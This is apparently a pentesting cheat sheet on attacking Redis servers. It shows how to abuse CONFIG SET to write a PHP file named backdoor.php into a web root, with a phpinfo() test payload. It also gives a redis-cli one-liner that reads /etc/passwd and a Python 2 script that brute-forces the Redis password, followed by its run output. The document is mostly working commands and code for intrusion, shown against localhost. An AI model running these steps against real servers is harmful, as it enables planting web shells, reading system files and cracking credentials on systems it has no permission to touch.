REDIS - Export File / Read File / Cracker

Export File

If redis and web service are both on the same server, maybe we can get a shell.

---

1. Connect to redis port (default: 6379).

lab:~/ $ redis-cli -h localhost -p 6379

1. Get current configuration

127.0.0.1:6379> CONFIG GET *  1) "dbfilename"  2) "dump.rdb"  3) "requirepass"  4) ""  5) "masterauth"  6) ""  7) "unixsocket"  8) ""  9) "logfile" 10) "" 11) "pidfile" 12) "/var/run/redis_6379.pid" 13) "maxmemory" 14) "3221225472" 15) "maxmemory-samples" 16) "5" 17) "timeout" 18) "0" 19) "tcp-keepalive" 20) "0" 21) "auto-aof-rewrite-percentage" 22) "100" 23) "auto-aof-rewrite-min-size" 24) "67108864" 25) "hash-max-ziplist-entries" 26) "512" 27) "hash-max-ziplist-value" 28) "64" 29) "list-max-ziplist-entries" 30) "512" 31) "list-max-ziplist-value" 32) "64" 33) "set-max-intset-entries" 34) "512" 35) "zset-max-ziplist-entries" 36) "128" 37) "zset-max-ziplist-value" 38) "64" 39) "hll-sparse-max-bytes" 40) "3000" 41) "lua-time-limit" 42) "5000" 43) "slowlog-log-slower-than" 44) "10000" 45) "latency-monitor-threshold" 46) "0" 47) "slowlog-max-len" 48) "128" 49) "port" 50) "6379" 51) "tcp-backlog" 52) "511" 53) "databases" 54) "16" 55) "repl-ping-slave-period" 56) "10" 57) "repl-timeout" 58) "60" 59) "repl-backlog-size" 60) "1048576" 61) "repl-backlog-ttl" 62) "3600" 63) "maxclients" 64) "10000" 65) "watchdog-period" 66) "0" 67) "slave-priority" 68) "100" 69) "min-slaves-to-write" 70) "0" 71) "min-slaves-max-lag" 72) "10" 73) "hz" 74) "10" 75) "cluster-node-timeout" 76) "15000" 77) "cluster-migration-barrier" 78) "1" 79) "cluster-slave-validity-factor" 80) "10" 81) "repl-diskless-sync-delay" 82) "5" 83) "cluster-require-full-coverage" 84) "yes" 85) "no-appendfsync-on-rewrite" 86) "no" 87) "slave-serve-stale-data" 88) "yes" 89) "slave-read-only" 90) "yes" 91) "stop-writes-on-bgsave-error" 92) "yes" 93) "daemonize" 94) "yes" 95) "rdbcompression" 96) "yes" 97) "rdbchecksum" 98) "yes" 99) "activerehashing"100) "yes"101) "repl-disable-tcp-nodelay"102) "no"103) "repl-diskless-sync"104) "no"105) "aof-rewrite-incremental-fsync"106) "yes"107) "aof-load-truncated"108) "yes"109) "appendonly"110) "no"111) "dir"112) "/var/redis/6379"113) "maxmemory-policy"114) "noeviction"115) "appendfsync"116) "everysec"117) "save"118) "900 1 300 10 60 10000"119) "loglevel"120) "notice"121) "client-output-buffer-limit"122) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"123) "unixsocketperm"124) "0"125) "slaveof"126) ""127) "notify-keyspace-events"128) ""129) "bind"130) ""127.0.0.1:6379> 

---

1. Export DB File.
   During pentesting, we can export a web shell also.

127.0.0.1:6379> CONFIG SET dir /var/www/OK127.0.0.1:6379> CONFIG SET dbfilename backdoor.phpOK127.0.0.1:6379> SET data "<?php phpinfo(); ?>"OK127.0.0.1:6379> SAVEOK127.0.0.1:6379> QUIT

---

We can view php information here.

root@kali:~# curl -o data.txt  http://localhost:8080/backdoor.php  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100 50181    0 50181    0     0  2219k      0 --:--:-- --:--:-- --:--:-- 2450kroot@kali:~# grep --color -i -n -a phpinfo data.txt 25:<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>

---

1. Restore REDIS Configuration

Clear redis operation data, and restore previous configuration.

127.0.0.1:6379> CONFIG SET dbfilename dump.rdbOK127.0.0.1:6379> CONFIG SET dir /var/redis/6379/OK127.0.0.1:6379> KEYS *1) "bar"2) "key"3) "foo"4) "data"127.0.0.1:6379> DEL data(integer) 1127.0.0.1:6379> KEYS *1) "bar"2) "key"3) "foo"127.0.0.1:6379> SAVEOK

---

Read File

redis-cli -x HSET passwd text </etc/passwdredis-cli --raw HGET passwd text >/tmp/passwd redis-cli DEL passwd

---

REDIS Cracker

If redis server sets a password, we can crack it with following demo.

#!/usr/bin/env python# -*- coding: utf8 -*-import socketimport logginglogging.basicConfig(level=logging.DEBUG,                     format="[*] %(funcName)s - %(message)s")logger = logging.getLogger('redis_cracker')BUFSIZE = 1024def crack_redis(host, port, password):    logger.debug('cracking resdis %s:%s with %s' % (host, port, password))    # create a socket for redis connection    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    ret = sock.connect_ex((host, port))    # failed to make a redis connection     if ret != 0:        logging.info("failed to connect to redis")        return False, None    # logger.debug('Check AUTH is enable or not')    # send a INFO request     sock.send('INFO\r\n')    # recv socket resp    data = sock.recv(BUFSIZE)    if "NOAUTH Authentication required" in data:        # crack password        sock.send('AUTH %s\r\n' % password)        data = sock.recv(BUFSIZE)        # auth successfully        if "+OK" in data:            logging.info("redis pass: [%s]\n" % password)            return True, password        # auth failed        else:            logging.debug("%s\n" % data.strip())    else:        logging.info("No password protection\n")        return True, None    return False, Noneif __name__ == "__main__":    passwords = ['admin', 'pass', 'password', '123']    host = "localhost"    port = 6379    for p in passwords:        bool, pwd = crack_redis(host, port, p)        if bool:            break

Now, we can crack localhost redis server.

root@kali:~# python2 crack_redis.py [*] crack_redis - cracking resdis localhost:6379 with admin[*] crack_redis - -ERR invalid password[*] crack_redis - cracking resdis localhost:6379 with pass[*] crack_redis - -ERR invalid password[*] crack_redis - cracking resdis localhost:6379 with password[*] crack_redis - redis pass: [password]

Redis pass: [password].

root@kali:~# redis-cli -h localhost -p 6379localhost:6379> AUTH passwordOK

Authentication is successful.

---

References

CN - Trying to hack Redis via HTTP requests
EN - Trying to hack Redis via HTTP requests